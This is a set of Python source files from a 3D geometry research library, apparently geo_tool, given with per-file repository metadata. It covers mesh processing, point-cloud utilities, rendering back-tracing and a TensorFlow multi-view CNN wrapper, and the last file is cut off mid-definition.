"text": "'''\nCreated on Jul 25, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any way\nyou want for non-commercial purposes.\n'''\n\nimport glob\nimport os\nimport os.path as osp\nfrom subprocess import call as sys_call\n\nfrom .. in_out import soup as io\n\n\nclass Back_Tracer():\n '''\n A class providing the basic functionality for converting information\n regarding 2D rendered output of Fythumb into back into thr 3D space\n of the Mesh models.\n '''\n\n fythumb_bin = '/Users/optas/Documents/Eclipse_Projects/3d/thumb3d/build/thumb3d'\n\n def __init__(self, triangle_folder, in_mesh):\n '''\n Constructor.\n '''\n self.mesh = in_mesh\n self.map = Back_Tracer.generate_pixels_to_triangles_map(triangle_folder, in_mesh)\n\n def from_2D_to_3D(self, pixels, vertex_id, twist_id):\n return self.map[vertex_id, twist_id][pixels]\n\n def is_legit_view_and_twist(self, vertex_id, twist_id):\n return (vertex_id, twist_id) in self.map\n\n @staticmethod\n def render_views_of_shapes(top_dir, output_dir, regex):\n io.copy_folder_structure(top_dir, output_dir)\n mesh_files = io.files_in_subdirs(top_dir, regex)\n if output_dir[-1] != os.sep:\n output_dir += os.sep\n\n for f in mesh_files:\n out_sub_folder = f.replace(top_dir, output_dir)\n mark = out_sub_folder[::-1].find('.') # Find last occurrence of '.' to remove the ending (e.g., .txt)\n if mark > 0:\n out_sub_folder = out_sub_folder[:-mark - 1]\n Back_Tracer.fythumb_compute_views_of_shape(f, out_sub_folder)\n\n @staticmethod\n def fythumb_compute_views_of_shape(mesh_file, output_dir):\n sys_call([Back_Tracer.fythumb_bin, '-i', mesh_file, '-o', output_dir, '-r'])\n\n @staticmethod\n def pixels_to_triangles(pixel_file, off_file, camera_vertex, camera_twist, output_dir, out_file_name):\n sys_call([Back_Tracer.fythumb_bin, '-i', off_file, '-s', pixel_file, '-o', output_dir,\n '-v', camera_vertex, '-t', camera_twist, '-f', out_file_name])\n\n @staticmethod\n def compute_triangles_from_pixels(off_file, pixels_folder, output_folder):\n searh_pattern = osp.join(pixels_folder, '*.txt')\n c = 0\n for pixel_file in glob.glob(searh_pattern):\n camera_vertex, camera_twist = io.name_to_cam_position(pixel_file, cam_delim='_')\n out_file_name = '%d_%d.txt' % (camera_vertex, camera_twist)\n print 'Computing Triangles for %s file.' % (pixel_file)\n Back_Tracer.pixels_to_triangles(pixel_file, off_file, str(camera_vertex), str(camera_twist), output_folder, out_file_name)\n c += 1\n print 'Computed the triangles for %d files.' % (c)\n\n @staticmethod\n def generate_pixels_to_triangles_map(triangle_folder, in_mesh):\n searh_pattern = osp.join(triangle_folder, '*.txt')\n inv_dict = in_mesh.inverse_triangle_dictionary()\n res = dict()\n for triangle_file in glob.glob(searh_pattern):\n camera_vertex, camera_twist = io.name_to_cam_position(triangle_file, cam_delim='_')\n res[(camera_vertex, camera_twist)] = dict()\n pixels, triangles, _ = io.read_triangle_file(triangle_file)\n triangles = map(tuple, triangles)\n triangles = [inv_dict[tr] for tr in triangles]\n pixels = map(tuple, pixels)\n res[(camera_vertex, camera_twist)] = {key: val for key, val in zip(pixels, triangles)}\n return res\n\nif __name__ == '__main__': \n from geo_tool.solids.mesh import Mesh\n in_mesh = Mesh('../Data/Screw/screw.off')\n bt = Back_Tracer('../Data/Screw/Salient_Triangles', in_mesh)\n print bt\n"
},
{
"alpha_fraction": 0.5539358854293823,
"alphanum_fraction": 0.5597667694091797,
"avg_line_length": 30.625,
"blob_id": "25efa5aab00cca93a12a3551bfc36ef98727727a",
"content_id": "678af4463361b6d5f1517dda1629287f9f6204de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1029,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 32,
"path": "/scripts/basic_qts_on_model_net_10.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 14, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\n\nimport os.path as osp\n\nfrom nn_saliency.src.mesh import Mesh\nimport nn_saliency.src.nn_io as nn_io\n\nclass_names = ['bathtub', 'bed', 'chair', 'desk', 'dresser', 'monitor', \n 'night_stand', 'sofa', 'table', 'toilet' ]\n\n\ndef connected_components_per_category(top_dir):\n res = dict()\n for category in class_names:\n category_dict = dict()\n look_at = osp.join(top_dir, category) \n off_files = nn_io.files_in_subdirs(look_at, '.off$')\n for model in off_files: \n in_mesh = Mesh(model)\n print in_mesh\n model_name = osp.basename(model)\n n_cc, _ = in_mesh.connected_components() \n category_dict[model_name] = n_cc \n res[category] = category_dict \n return res\n \n "
},
{
"alpha_fraction": 0.6204202771186829,
"alphanum_fraction": 0.6414331793785095,
"avg_line_length": 35.40196228027344,
"blob_id": "84cde06244cc011a3a7ae182d30b956383dc9e3b",
"content_id": "1875110bb05ac37092d93f63297800da5c1efd46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3712,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 102,
"path": "/point_clouds/aux.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Aug 21, 2017\n\n@author: optas\n'''\nimport warnings\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.sparse.linalg import eigs\nfrom numpy.linalg import norm\n\nfrom .. fundamentals import Graph\nfrom .. utils.linalg_utils import l2_norm\n\ndef greedy_match_pc_to_pc(from_pc, to_pc):\n '''map from_pc points to to_pc by minimizing the from-to-to euclidean distance.'''\n nn = NearestNeighbors(n_neighbors=1).fit(to_pc)\n distances, indices = nn.kneighbors(from_pc)\n return indices, distances\n\n\ndef chamfer_pseudo_distance(pc1, pc2):\n _, d1 = greedy_match_pc_to_pc(pc1, pc2)\n _, d2 = greedy_match_pc_to_pc(pc2, pc1)\n return np.sum(d1) + np.sum(d2)\n\n\ndef laplacian_spectrum(pc, n_evecs, k=6):\n ''' k: (int) number of nearest neighbors each point is connected with in the constructed Adjacency\n matrix that will be used to derive the Laplacian.\n '''\n neighbors_ids, distances = pc.k_nearest_neighbors(k)\n A = Graph.knn_to_adjacency(neighbors_ids, distances)\n if Graph.connected_components(A)[0] != 1:\n raise ValueError('Graph has more than one connected component, increase k.')\n A = (A + A.T) / 2.0\n L = Graph.adjacency_to_laplacian(A, 'norm').astype('f4')\n evals, evecs = eigs(L, n_evecs + 1, sigma=-10e-1, which='LM')\n if np.any(l2_norm(evecs.imag, axis=0) / l2_norm(evecs.real, axis=0) > 1.0 / 100):\n warnings.warn('Produced eigen-vectors are complex and contain significant mass on the imaginary part.')\n\n evecs = evecs.real # eigs returns complex values by default.\n evals = evals.real\n\n index = np.argsort(evals) # Sort evals from smallest to largest\n evals = evals[index]\n evecs = evecs[:, index]\n return evals, evecs\n\n\ndef unit_cube_grid_point_cloud(resolution, clip_sphere=False):\n '''Returns the center coordinates of each cell of a 3D grid with resolution^3 cells,\n that is placed in the unit-cube.\n If clip_sphere it True it drops the \"corner\" cells that lie outside the unit-sphere.\n '''\n grid = np.ndarray((resolution, resolution, resolution, 3), np.float32)\n spacing = 1.0 / float(resolution - 1)\n for i in xrange(resolution):\n for j in xrange(resolution):\n for k in xrange(resolution):\n grid[i, j, k, 0] = i * spacing - 0.5\n grid[i, j, k, 1] = j * spacing - 0.5\n grid[i, j, k, 2] = k * spacing - 0.5\n\n if clip_sphere:\n grid = grid.reshape(-1, 3)\n grid = grid[norm(grid, axis=1) <= 0.5]\n\n return grid, spacing\n\n\ndef point_cloud_to_volume(points, vsize, radius=1.0):\n \"\"\" input is Nx3 points.\n output is vsize*vsize*vsize\n assumes points are in range [-radius, radius]\n Original from https://github.com/daerduoCarey/partnet_seg_exps/blob/master/exps/utils/pc_util.py\n \"\"\"\n vol = np.zeros((vsize,vsize,vsize))\n voxel = 2*radius/float(vsize)\n locations = (points + radius)/voxel\n locations = locations.astype(int)\n vol[locations[:, 0], locations[:, 1], locations[:, 2]] = 1.0\n return vol\n\n\ndef volume_to_point_cloud(vol):\n \"\"\" vol is occupancy grid (value = 0 or 1) of size vsize*vsize*vsize\n return Nx3 numpy array.\n Original from Original from https://github.com/daerduoCarey/partnet_seg_exps/blob/master/exps/utils/pc_util.py\n \"\"\"\n vsize = vol.shape[0]\n assert(vol.shape[1] == vsize and vol.shape[1] == vsize)\n points = []\n for a in range(vsize):\n for b in range(vsize):\n for c in range(vsize):\n if vol[a,b,c] == 1:\n points.append(np.array([a, b, c]))\n if len(points) == 0:\n return np.zeros((0, 3))\n points = np.vstack(points)\n return points"
},
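`point_cloud_to_volume` and `volume_to_point_cloud` above are near-inverses up to quantization: points are binned into a `vsize`^3 occupancy grid, and the reverse call returns occupied voxel indices rather than the original coordinates. A small round-trip sketch under the stated [-radius, radius] assumption:

```python
import numpy as np

pts = np.random.uniform(-0.9, 0.9, size=(100, 3))    # safely inside [-1, 1]
vol = point_cloud_to_volume(pts, vsize=32, radius=1.0)
occupied = volume_to_point_cloud(vol)                 # Nx3 voxel indices
print(vol.shape, occupied.shape)                      # (32, 32, 32) (<=100, 3)
```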
{
"alpha_fraction": 0.5666472315788269,
"alphanum_fraction": 0.5849120616912842,
"avg_line_length": 41.014286041259766,
"blob_id": "9c7fa48cd560af8938e5f6d340de5381d5fe1cf9",
"content_id": "959a355d257987f9d7434dc4729d0e2ce6162af0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20586,
"license_type": "permissive",
"max_line_length": 168,
"num_lines": 490,
"path": "/solids/mesh.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on July 18, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport itertools\nimport warnings\nimport copy\nimport numpy as np\nfrom scipy import sparse as sp\nfrom numpy.matlib import repmat\nfrom six.moves import cPickle\n\nfrom general_tools.arrays.basics import unique_rows\n\nfrom . mesh_cleaning import filter_vertices\n\nfrom .. utils import linalg_utils as utils\nfrom .. utils.linalg_utils import accumarray\nfrom .. in_out import soup as io\nfrom .. fundamentals import Graph, Cuboid\nfrom .. point_clouds import Point_Cloud\n\n# try:\n# from mayavi import mlab as mayalab\n# except:\n# warnings.warn('Mayavi library was not found. Some graphics utilities will be disabled.')\n\nl2_norm = utils.l2_norm\n\n\nclass Mesh(object):\n '''\n A class representing a triangular Mesh of a 3D surface. Provides a variety of relevant functions, including\n loading and plotting utilities.\n '''\n def __init__(self, vertices=None, triangles=None, file_name=None):\n '''Mesh Constructor.\n Args:\n vertices (N x 3 numpy array): where N is the number of vertices of the underlying mesh.\n triangles (T x 3 numpy array): where T is the number of triangles of the underlying mesh.\n Each line specifies the 3 vertices that that the particular triangle references in the\n \\'vertices\\' list.\n file_name (optional, String): file name of an .obj or .off file. If given, the mesh will be\n loaded from this file.\n '''\n if file_name is not None:\n self.vertices, self.triangles = io.load_mesh_from_file(file_name)[:2]\n else:\n self.vertices = vertices\n self.triangles = triangles\n\n def __str__(self):\n return 'Mesh with %d vertices and %d triangles.' % (self.num_vertices, self.num_triangles)\n\n @property\n def vertices(self):\n return self._vertices\n\n @property\n def triangles(self):\n return self._triangles\n\n @vertices.setter\n def vertices(self, value):\n self._vertices = value\n self.num_vertices = len(self._vertices)\n\n @triangles.setter\n def triangles(self, value):\n self._triangles = value\n self.num_triangles = len(self._triangles)\n if not all([len(set(tr)) == 3 for tr in self._triangles]):\n warnings.warn('Not real triangles (but lines or points) exist in the triangle list.')\n if np.max(self._triangles) > self.num_vertices - 1 or np.min(self._triangles) < 0:\n raise ValueError('Triangles referencing non-vertices.')\n\n def copy(self):\n return copy.deepcopy(self)\n\n def save(self, file_out):\n with open(file_out, \"wb\") as f_out:\n cPickle.dump(self, f_out, protocol=2)\n\n def plot(self, triangle_function=np.array([]), vertex_function=np.array([]), show=True, *args, **kwargs):\n if vertex_function.any() and triangle_function.any():\n raise ValueError('Either the vertices or the faces can mandate color. 
Not both.')\n\n if triangle_function.any():\n if len(triangle_function) != self.num_triangles:\n raise ValueError('Function of triangles has inappropriate number of elements.')\n mesh_plot = mayalab.triangular_mesh(self.vertices[:, 0], self.vertices[:, 1], self.vertices[:, 2], self.triangles, *args, **kwargs)\n self.__decorate_mesh_with_triangle_color(mesh_plot, triangle_function)\n\n elif vertex_function.any():\n if len(vertex_function) != self.num_vertices:\n raise ValueError('Function of vertices has inappropriate number of elements.')\n mesh_plot = mayalab.triangular_mesh(self.vertices[:, 0], self.vertices[:, 1], self.vertices[:, 2], self.triangles, scalars=vertex_function, *args, **kwargs)\n\n else:\n mesh_plot = mayalab.triangular_mesh(self.vertices[:, 0], self.vertices[:, 1], self.vertices[:, 2], self.triangles, *args, **kwargs)\n\n if show:\n mayalab.show()\n\n return mesh_plot\n\n def plot_normals(self, scale_factor=1, representation='mesh'):\n self.plot(show=False, representation=representation)\n bary = self.barycenter_of_triangles()\n normals = Mesh.normals_of_triangles(self.vertices, self.triangles)\n mayalab.quiver3d(bary[:, 0], bary[:, 1], bary[:, 2], normals[:, 0], normals[:, 1], normals[:, 2], scale_factor=scale_factor)\n mayalab.show()\n\n def undirected_edges(self):\n perm_gen = lambda x: list(itertools.permutations(x, 2))\n edges = np.zeros(shape=(self.num_triangles, 6, 2), dtype=np.int32) # Each triangle produces 6 undirected edges.\n for i, t in enumerate(self.triangles):\n edges[i, :] = perm_gen(t)\n edges.resize(self.num_triangles * 6, 2)\n return unique_rows(edges)\n\n def directed_edges(self):\n ''' For each triangle (A,B,C) we consider the edges (A,B) and (B,C), i.e., the direction comes from\n the order the vertices are listed in the triangles.\n TODO-P.\n '''\n pass\n\n def boundary(self):\n ''' TODO-P\n https://www.mathworks.com/matlabcentral/mlc-downloads/downloads/submissions/5355/versions/5/previews/toolbox_graph/compute_boundary.m/index.html?access_key=\n '''\n pass\n\n def correct_mesh_orientation(self):\n '''https://github.com/scikit-image/scikit-image/blob/master/skimage/measure/_marching_cubes_classic.py\n TODO-L\n '''\n pass\n\n def adjacency_matrix(self):\n E = self.undirected_edges()\n vals = np.squeeze(np.ones((len(E), 1)))\n return sp.csr_matrix((vals, (E[:, 0], E[:, 1])), shape=(self.num_vertices, self.num_vertices))\n\n def connected_components(self):\n return Graph.connected_components(self.adjacency_matrix())\n\n def largest_connected_component(self):\n # TODO operates on self or copy?\n ncc, node_labels = self.connected_components()\n if ncc == 1:\n return self\n unique_labels, counts = np.unique(node_labels, return_counts=True)\n maximizer = unique_labels[np.argmax(counts)]\n keep_nodes = np.where(node_labels == maximizer)[0]\n return filter_vertices(self, keep_nodes)\n\n def barycenter_of_triangles(self):\n tr_in_xyz = self.vertices[self.triangles]\n return np.sum(tr_in_xyz, axis=1) / 3.0\n\n def edge_length_of_triangles(self):\n '''Computes the length of each edge, of each triangle in the underlying triangular mesh.\n\n Returns:\n L - (num_of_triangles x 3) L[i] is a triplet containing the lengths of the 3 edges corresponding to the i-th triangle.\n The enumeration of the triangles is the same at in -T- and the order in which the edges are\n computed is (V2, V3), (V1, V3) (V1, V2). I.e. 
L[i][2] is the edge length between the 1st\n vertex and the second vertex of the i-th triangle.'''\n V = self.vertices\n T = self.triangles\n L1 = l2_norm(V[T[:, 1], :] - V[T[:, 2], :], axis=1)\n L2 = l2_norm(V[T[:, 0], :] - V[T[:, 2], :], axis=1)\n L3 = l2_norm(V[T[:, 0], :] - V[T[:, 1], :], axis=1)\n return np.transpose(np.vstack([L1, L2, L3]))\n\n def inverse_triangle_dictionary(self):\n '''Returns a dictionary mapping triangles, i.e., triplets (n1, n2, n3) into their\n position in the array of triangles kept.\n '''\n keys = map(tuple, self.triangles)\n return dict(zip(keys, range(len(keys))))\n\n def angles_of_triangles(self):\n # TODO: Consider compute via way mentioned in Meyer's\n L = self.edge_length_of_triangles()\n L1 = L[:, 0]\n L2 = L[:, 1]\n L3 = L[:, 2]\n\n L1_sq = np.square(L1)\n L2_sq = np.square(L2)\n L3_sq = np.square(L3)\n\n A1 = (L2_sq + L3_sq - L1_sq) / (2. * L2 * L3) # Cosine of angles for first set of edges.\n A2 = (L1_sq + L3_sq - L2_sq) / (2 * L1 * L3)\n A3 = (L1_sq + L2_sq - L3_sq) / (2 * L1 * L2)\n A = np.transpose(np.vstack([A1, A2, A3]))\n\n if np.any(A <= -1) or np.any(A >= 1) or (np.isfinite(A) == False).any():\n warnings.warn('The mesh has degenerate triangles with angles outside the (0,pi) interval. This angles will be set to 0.')\n A[np.logical_or(A >= 1, A <= -1, np.isfinite(A) == False)] = 1\n\n A = np.arccos(A)\n assert(np.all(np.logical_and(A < np.pi, A >= 0)))\n return A\n\n def area_of_triangles(self):\n '''Computes the area of each triangle, in a triangular mesh.\n '''\n A = Mesh.normals_of_triangles(self.vertices, self.triangles)\n A = l2_norm(A, axis=1) / 2.0\n if np.any(A <= 0):\n warnings.warn('The mesh has triangles with non positive area.')\n return A\n\n def area_of_vertices(self, area_type='barycentric'):\n '''\n area_type == 'barycentric' associates with every vertex the area of its adjacent barycentric cells.\n 'barycentric_avg' same as 'barycentric' but post multiplied with the adjacency matrix. I.e.,\n each node is assigned the average of the barycentric areas of it's neighboring nodes.\n '''\n def barycentric_area():\n I = np.hstack([T[:, 0], T[:, 1], T[:, 2]])\n J = np.hstack([T[:, 1], T[:, 2], T[:, 0]])\n Mij = (1.0 / 12) * np.hstack([Ar, Ar, Ar])\n Mji = np.copy(Mij)\n Mii = (1.0 / 6) * np.hstack([Ar, Ar, Ar])\n In = np.hstack([I, J, I])\n Jn = np.hstack([J, I, I])\n Mn = np.hstack([Mij, Mji, Mii])\n M = sp.csr_matrix((Mn, (In, Jn)), shape=(self.num_vertices, self.num_vertices))\n M = np.array(M.sum(axis=1))\n return M\n\n Ar = self.area_of_triangles()\n T = self.triangles\n\n if area_type == 'barycentric':\n M = barycentric_area()\n elif area_type == 'barycentric_avg':\n M = self.adjacency_matrix() * barycentric_area()\n else:\n raise(NotImplementedError)\n\n if np.any(M <= 0):\n warnings.warn('The area_type \\'%s\\' produced vertices with non-positive area.' % (area_type))\n return M\n\n def sum_vertex_function_on_triangles(self, v_func):\n if len(v_func) != self.num_vertices:\n raise ValueError('Provided vertex function has inappropriate dimensions. 
')\n T = self.triangles\n tr_func = v_func[T[:, 0]] + v_func[T[:, 1]] + v_func[T[:, 2]]\n return tr_func\n\n def barycentric_interpolation_of_vertex_function(self, v_func, key_points, faces_of_key_points):\n ''' It computes the linearly interpolated values of a vertex function, over a set of 3D key-points that\n reside inside the mesh triangles.\n\n Args:\n v_func (num_vertices x 1 numpy array).\n key_points (M x 3 numpy array): coordinates of 3D points.\n faces_of_key_points (M x 1): face ids of the faces each key_point resides on.\n\n Returns:\n (M x 1): Function that linearly interpolates the v_func on each key_point.\n '''\n\n if len(v_func) != self.num_vertices:\n raise ValueError('Provided vertex function has inappropriate dimensions. ')\n\n A = self.vertices[self.triangles[faces_of_key_points, 0], :] # 1st Vertex of each referenced triangle.\n B = self.vertices[self.triangles[faces_of_key_points, 1], :]\n C = self.vertices[self.triangles[faces_of_key_points, 2], :]\n\n total_area = l2_norm(np.cross(A - B, A - C), axis=1) # 2 Times area of each referenced triangle.\n\n # Barycentric Coefficients of the three 'barycentric' triangles in each triangle (i.e. the ratio of their areas to the total_area)\n c_0 = l2_norm(np.cross(key_points - B, B - C), axis=1) / total_area\n c_1 = l2_norm(np.cross(key_points - A, A - C), axis=1) / total_area\n c_2 = l2_norm(np.cross(key_points - A, A - B), axis=1) / total_area\n\n vf_0 = v_func[self.triangles[faces_of_key_points, 0]]\n vf_1 = v_func[self.triangles[faces_of_key_points, 1]]\n vf_2 = v_func[self.triangles[faces_of_key_points, 2]]\n res = (c_0 * vf_0) + (c_1 * vf_1) + (c_2 * vf_2)\n return res\n\n def normals_of_vertices(self, weight='areas', normalize=False):\n '''Computes the outward normal at each vertex by adding the weighted normals of each triangle a\n vertex is adjacent to. 
The weights that are used to combine the normals are the areas of the triangles\n a normal comes from.\n\n Args:\n normalize (boolean): if True, then the normals have unit length.\n\n Returns:\n N - (num_of_vertices x 3) an array containing the normalized outward normals of all the vertices.\n '''\n V = self.vertices\n T = self.triangles\n\n normals = Mesh.normals_of_triangles(V, T, normalize=True)\n if weight == 'areas':\n weights = self.area_of_triangles()\n normals = (normals.T * weights).T\n\n nx = accumarray(T.ravel('C'), repmat(np.array([normals[:, 0]]).T, 1, 3).ravel('C'))\n ny = accumarray(T.ravel('C'), repmat(np.array([normals[:, 1]]).T, 1, 3).ravel('C'))\n nz = accumarray(T.ravel('C'), repmat(np.array([normals[:, 2]]).T, 1, 3).ravel('C'))\n normals = (np.vstack([nx, ny, nz])).T\n\n if normalize:\n row_norms = l2_norm(normals, axis=1)\n row_norms[row_norms == 0] = 1\n normals = (normals.T / row_norms).T\n\n return normals\n\n def bounding_box(self):\n return Cuboid.bounding_box_of_3d_points(self.vertices)\n\n def center_in_unit_sphere(self, force_scaling=False):\n self.vertices = Point_Cloud.center_points(self.vertices, center='unit_sphere', force_scaling=force_scaling)\n return self\n\n def sample_faces(self, n_samples, vertex_weights=None, seed=None, compute_normals=False):\n \"\"\"Generates a point cloud representing the surface of the mesh by sampling points proportionally to the area of each face.\n\n Args:\n n_samples (int) : number of points to be sampled in total\n vertex_weights ():\n compute_normals (boolean):\n Returns:\n numpy array (n_samples, 3) containing the [x,y,z] coordinates of the samples.\n If compute_normals is True: \n\n Reference :\n http://chrischoy.github.in_out/research/barycentric-coordinate-for-mesh-sampling/\n [1] Barycentric coordinate system\n\n \\begin{align}\n P = (1 - \\sqrt{r_1})A + \\sqrt{r_1} (1 - r_2) B + \\sqrt{r_1} r_2 C\n \\end{align}\n \"\"\"\n\n face_areas = self.area_of_triangles()\n\n if vertex_weights is not None:\n if np.any(vertex_weights < 0):\n raise ValueError('Negative vertex weights detected.')\n face_weights = self.sum_vertex_function_on_triangles(vertex_weights)\n face_areas = np.multiply(face_areas, face_weights)\n\n face_areas = face_areas / np.sum(face_areas) # Convert to probability.\n\n if seed is not None:\n np.random.seed(seed)\n\n sample_face_idx = np.random.choice(self.num_triangles, n_samples, p=face_areas)\n\n r = np.random.rand(n_samples, 2)\n A = self.vertices[self.triangles[sample_face_idx, 0], :]\n B = self.vertices[self.triangles[sample_face_idx, 1], :]\n C = self.vertices[self.triangles[sample_face_idx, 2], :]\n m = np.sqrt(r[:, 0:1])\n n = r[:, 1:]\n P = (1 - m) * A + m * (1 - n) * B + m * n * C\n\n # If normals are computed, returns Nx6 matrices where last 3 are the normals.\n if compute_normals:\n nV = self.normals_of_vertices(normalize=True) \n #nV = self.normals_of_triangles(self.vertices, self.triangles, normalize=True)\n \n nA = nV[self.triangles[sample_face_idx, 0], :]\n nB = nV[self.triangles[sample_face_idx, 1], :]\n nC = nV[self.triangles[sample_face_idx, 2], :]\n nP = (1 - m) * nA + m * (1 - n) * nB + m * n * nC\n P = np.append(P, nP, axis=1)\n\n return P, sample_face_idx\n\n def swap_axes_of_vertices(self, permutation):\n v = self.vertices\n nv = self.num_vertices\n vx = v[:, permutation[0]].reshape(nv, 1)\n vy = v[:, permutation[1]].reshape(nv, 1)\n vz = v[:, permutation[2]].reshape(nv, 1)\n self.vertices = np.hstack((vx, vy, vz))\n\n def swap_axes_of_triangles(self, permutation):\n t = 
self.triangles\n nt = self.num_triangles\n t0 = t[:, permutation[0]].reshape(nt, 1)\n t1 = t[:, permutation[1]].reshape(nt, 1)\n t2 = t[:, permutation[2]].reshape(nt, 1)\n self.triangles = np.hstack((t0, t1, t2))\n\n def swap_axes_of_vertices_and_triangles(self, permutation):\n self.swap_axes_of_triangles(permutation)\n self.swap_axes_of_vertices(permutation)\n\n def volume(self):\n '''\n Estimates the volume of the mesh. The estimate is correct for meshes with no overlapping or intersecting triangles.\n See: http://stackoverflow.com/questions/1406029/how-to-calculate-the-volume-of-a-3d-mesh-object-the-surface-of-which-is-made-up\n '''\n V = self.vertices\n T = self.triangles\n P1 = V[T[:, 0], :]\n P2 = V[T[:, 1], :]\n P3 = V[T[:, 2], :]\n v321 = P3[:, 0] * P2[:, 1] * P1[:, 2]\n v231 = P2[:, 0] * P3[:, 1] * P1[:, 2]\n v312 = P3[:, 0] * P1[:, 1] * P2[:, 2]\n v132 = P1[:, 0] * P3[:, 1] * P2[:, 2]\n v213 = P2[:, 0] * P1[:, 1] * P3[:, 2]\n v123 = P1[:, 0] * P2[:, 1] * P3[:, 2]\n return (1.0 / 6.0) * np.sum(-v321 + v231 + v312 - v132 - v213 + v123)\n# return (1.0 / 6.0) * np.sum((np.cross(P2, P3) * P1)) # Faster but a bit more unstable version.\n\n @staticmethod\n def __decorate_mesh_with_triangle_color(mesh_plot, triangle_function): # TODO-P do we really need this to be static?\n mesh_plot.mlab_source.dataset.cell_data.scalars = triangle_function\n mesh_plot.mlab_source.dataset.cell_data.scalars.name = 'Cell data'\n mesh_plot.mlab_source.update()\n mesh2 = mayalab.pipeline.set_active_attribute(mesh_plot, cell_scalars='Cell data')\n mayalab.pipeline.surface(mesh2)\n\n @staticmethod\n def normals_of_triangles(V, T, normalize=False):\n '''Computes the normal vector of each triangle of a given mesh.\n Args:\n V - (num_of_vertices x 3) 3D coordinates of the mesh vertices.\n T - (num_of_triangles x 3) T[i] are the 3 indices corresponding to the 3 vertices of\n the i-th triangle. The indexing is based on -V-.\n normalize - (Boolean, optional) if True, the normals will be normalized to have unit lenght.\n\n Returns:\n N - (num_of_triangles x 3) an array containing the outward normals of all the triangles.\n '''\n # TODO See this: https://www.mathworks.com/matlabcentral/fileexchange/5355-toolbox-graph/content/toolbox_graph/compute_normal.m\n N = np.cross(V[T[:, 0], :] - V[T[:, 1], :], V[T[:, 0], :] - V[T[:, 2], :])\n if normalize:\n row_norms = l2_norm(N, axis=1)\n N = (N.T / row_norms).T\n return N\n\n @staticmethod\n def load(in_file):\n with open(in_file, 'rb') as f_in:\n res = cPickle.load(f_in)\n return res\n\n\n# #taubin's approximation for principle curvatures\n# #TODO finish\n# def principle_curvatures(self):\n# T=self.triangles\n# V=self.vertices\n# E=self.build_edges()\n# areaT=self.area_of_triangles()\n# normV=self.normals_of_vertices(normalize=True)\n# pij = None\n# mij = None\n# ni= None\n# vi=0\n# for i in range(V.shape[0]):\n# nbs=np.where(E[i,:] >= 0)\n# ni=np.expand_dims(normV[i,:], axis=1)\n# pij=np.identity(3)-ni*ni.T\n# mij=np.zeros((3,3))\n# wts=0\n# for j in range(nbs.shape[0]):\n# dij=np.expand_dims(V[i,:]-V[j,:],axis=1)\n# kij=2*(ni.T*dij)/l2_norm(dij)\n# tij=pij*dij\n# tij=tij/l2_norm(tij)\n# wij=areaT[E[i,j]]\n# if areaT[E[j,i]]>=0:\n# wij=wij+areaT[E[j,i]]\n# mij=wij*kij*tij*tij.T\n# wts=wts+wij\n# mij=mij/wts"
},
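A rough usage sketch of the Mesh class above. The import path is inferred from the record's `path` field (`solids/mesh.py`) and the repo name, so treat it as an assumption; the input file name is a placeholder:

    from geo_tool.solids.mesh import Mesh   # import path inferred from metadata; an assumption

    mesh = Mesh(file_name='bunny.off')      # placeholder .off file
    mesh.center_in_unit_sphere()
    # Area-weighted surface sampling; fixing the seed makes the draw reproducible.
    points, face_ids = mesh.sample_faces(n_samples=1024, seed=42)
    print(mesh, points.shape, mesh.volume())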
{
"alpha_fraction": 0.5434604287147522,
"alphanum_fraction": 0.5703157186508179,
"avg_line_length": 36.2442741394043,
"blob_id": "1f47cd6f7d67f8ca6534857356cae270f63d9f64",
"content_id": "df779816586095f61e330fdedbdf9d4312bc76e7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4878,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 131,
"path": "/scripts/mvcnn_wrapper.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "import sys\nimport tensorflow as tf\nimport numpy as np\n\ngit_path = '/Users/t_achlp/Documents/Git_Repos/'\nsys.path.insert(0, git_path)\n\nfrom autotensor import autograph\nimport nn_saliency.src.nn_io as nn_io\n\n\nIMG_SIZE = (224, 224)\nPART_VIEWS = 80\nNUM_CLASSES = 20\n\nimage_pl = tf.placeholder(tf.float32, shape=(None, IMG_SIZE[0], IMG_SIZE[1], 1))\nkeep_prob = tf.placeholder(tf.float32, name='keep_prob')\ng = autograph()\n\ndef compute_inferenceA(input) :\n \n layer = g.conv2d(input, filters=96, field_size=7, stride=2, padding='SAME', name=\"conv1\")\\\n .relu()\\\n .maxpool(kernel=(3,3), stride=(2,2))\\\n .lrn(radius=5, bias=2, alpha=0.0001/5.0, beta=0.75)\n \n layer = g.conv2d(layer, filters=256, field_size=5, stride=2, padding='SAME', name=\"conv2\")\\\n .relu()\\\n .maxpool(kernel=(3,3), stride=(2,2))\\\n .lrn(radius=5, bias=2, alpha=0.0001/5.0, beta=0.75)\n \n layer = g.conv2d(layer, filters=256, field_size=3, stride=1, padding='SAME', name=\"conv3\")\\\n .relu()\n\n layer = g.conv2d(layer, filters=256, field_size=3, stride=1, padding='SAME', name=\"conv4\")\\\n .relu()\n\n layer = g.conv2d(layer, filters=256, field_size=3, stride=1, padding='SAME', name=\"conv5\")\\\n .relu()\\\n .maxpool(kernel=(3,3), stride=(2,2))\n\n return layer\n \n \ndef compute_inferenceB(input) :\n \n layer = g.fully_connected(input, 4096, name=\"fc6\")\\\n .relu()\\\n .dropout(keep_prob)\n \n layer = g.fully_connected(layer, 4096, name=\"fc7\")\\\n .relu()\\\n 